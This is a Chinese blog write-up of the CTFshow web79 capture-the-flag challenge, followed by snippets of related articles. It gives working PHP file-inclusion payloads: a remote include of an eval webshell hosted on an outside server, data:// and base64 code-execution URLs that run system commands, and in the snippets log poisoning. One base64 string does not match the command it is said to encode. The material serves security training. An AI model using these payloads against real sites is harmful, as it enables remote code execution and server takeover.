php文件包含-CTFshow-web79

最新推荐文章于 2024-07-04 14:42:56 发布
最新推荐文章于 2024-07-04 14:42:56 发布
阅读量481 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/119090350
版权

0 前言

在上一篇文章,我们尝试 5 种协议来实现文件包含。但在 web79 中,代码使用 str_replace 函数将字符串中的 php 替换成 ??? ,所以我们要尽可能的避免使用关键字 php

1 file:// 或 不使用协议

方法同 php文件包含-CTFshow-web78

2 http://

在上一篇文章中,使用的链接为 https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval.php,在链接的尾部含有 php 关键字,无法直接使用。

  • 我使用和 eval.php 相同的代码,创建 eval 文件。
<?php @eval($_GET[code]);echo PHP_DATADIR;?>
  • 上传到 cos,获得链接 https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval
  • 访问 view-source:http://0a64af68-10fc-462f-b88e-44dc7e1f000d.challenge.ctf.show:8080/?file=https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval&code=system('cat flag.php'); 即可获得 flag。

3 php://

该协议必须使用 php 开头,题目又过滤了 php 关键字,所以无法使用。
web78 中的 php 改成 PHP 即可。

Note: str_replace 对大小写不敏感

4 zlib://

file:// 协议

5 data://

这里有 2 种关键的思路。一是利用特殊的 PHP 语言标记,二是利用编码绕过。

5.1 特殊的 PHP 语言标记

常见的 PHP 语言标记有如下几种:

  • <?php phpinfo() ?>:如果只含有 PHP 代码, ?> 不允许存在。?> 隐含一个 ;,所以最后一句可以不用分号。
  • <script language=“php”>phpinfo()<script>
  • <? ?>:需要修改 PHP 的 short_open_tag 配置
  • <% %>:默认禁用。
  • <?=$variablename ?>:默认可用。
  • <%=$variablename  %>:默认禁用。

这里需要可以利用 <? ?> 这个语言标记。访问 http://0a64af68-10fc-462f-b88e-44dc7e1f000d.challenge.ctf.show:8080/?file=data:text/plain,<?=system('tac *')?> 即可获得 flag。

Note: 这里的 tac * 的作用是查看当前文件夹的所有文件(不查看子目录的),在 CTF 中还是比较实用的。可以根据自己的需求进行变形,比如 tac /*

5.2 编码绕过

  • <?php system('tac *'); 进行 base64 编码,得到字符串
PD9waHAgc3lzdGVtKG5sIGZsYWcucGhwKTs=
  • 访问链接 http://6a01dd29-9ab6-43c0-abff-c81cfdb70225.challenge.ctf.show:8080/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKicpOw== 即可获得 flag。

Note:有时候 flag 在源码中,多查看源码。

6 总结

我在思考第 5 步的时候,想到了可能可以利用大小写来进行绕过。通过查询官方文档,发现 str_replace 对大小写不敏感。

PHP 这个关键词可用之后,那么 web78 的所有方法都可以使用,只需要将小写的 php 替换成大写的 PHP

chiehw
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 文件包含 web79
Kradress的博客
12-07 682
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
Ctfshow web入门-web79-web81 WP
qq_45427131的博客
05-23 1309
web79 查看源码发现没有过滤,直接php伪协议包含 知识点——php伪协议 ,伪协议有很多,文件包含可以用php://filter payload: ?file=php://filter/read=convert.base64-encode/resource=需要包含的文件 执行,获取到base64加密之后的字符串然后解码 web80 查看代码,发现str_replace过滤了php,这个可以用大小写绕过,但是这里不推荐,因为能data命令执行 知识点——data命令执行: data:text/
ctfshow-web入门-文件包含web78、web79web80、web81)
最新发布
Welcome To Myon'Blog !
07-04 1427
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 566
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
PHP 文件包含 -ctf
时光凉春衫薄的博客
08-08 653
php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini” http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php? file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== 也可以用来读php文件源码: data:text/plain,<?phpsystem(‘c..
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1844
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
php文件包含-CTFshow-web78
读万卷书,行万里路。
07-25 329
1 file:// 或 不使用协议 (将文件直接读入,无法进行编码,会被 php 执行) 包含一句话木马,实现代码执行来读取 flag。 访问URLhttp://21da7ba4-6818-45bc-903a-7eb4c78a3284.challenge.ctf.show:8080/?file=file:///var/log/nginx/access.log,来确定是否能读取 nginx 的日志。 确定可以访问 nginx 的日志后。使用Burp进行抓包,并修改 User-Agent 为 <?
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CTFshow web入门web79-文件包含2
weixin_74336671的博客
11-28 112
初始化界面:通过分析得知,此处对php进行过滤,因此此处我们使用date伪协议,data协议进行base64转码:?
ctfshow web入门文件包含web78-81
m0_62207170的博客
04-16 165
ctfshow web入门文件包含web78-81
CTFSHOW大赛原题篇(web771-web790)
羽的博客
03-04 945
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。 暂时先更新到这了,毕竟还是要工作的。。。。 文章目录web771web773web774web775web776web 777web778web779web780web781web782web784web785web786web787web788web789web790 web771 GXYCTF2019 你的名字 题目过滤了{{}} 只要使用就直接报错,所以只能用{%%}进行盲注了 然后也过滤了一些字符,但是只是替换成空了。所以可以直接往想使用的字
ctfshow学习记录-web入门文件包含78-87)
龟速更新的九某人
07-04 1665
ctfshow学习记录-web入门文件包含web78-87)
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4180
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
2222222
m0_74011969的博客
01-15 350
wp
文件包含漏洞详解与ctfshow文件包含漏洞模块的练习
RealIiikun的博客
03-25 479
​ 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
CTFshow-文件包含
qq_61376069的博客
01-19 252
CTFshow入门——文件包含
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4079
文件包含漏洞详解
CTFshow_web入门_文件包含(web78~web88)
monster663的博客
02-02 990
web78 直接包含,如果不知道就去学习一下什么是文件包含 ?file=php://filter/read=convert.base64-encode/resource=flag.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__);
CTF挑战:WP1-ctfshow解题攻略
- 往往备份文件(如`.bak`)包含原始文件的未修改版本,可能会泄露敏感信息。通过访问这些文件,有时能直接找到flag。 总结来说,这些技术涵盖了网络请求的定制、HTTP响应分析、Web服务器漏洞利用、认证绕过、文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值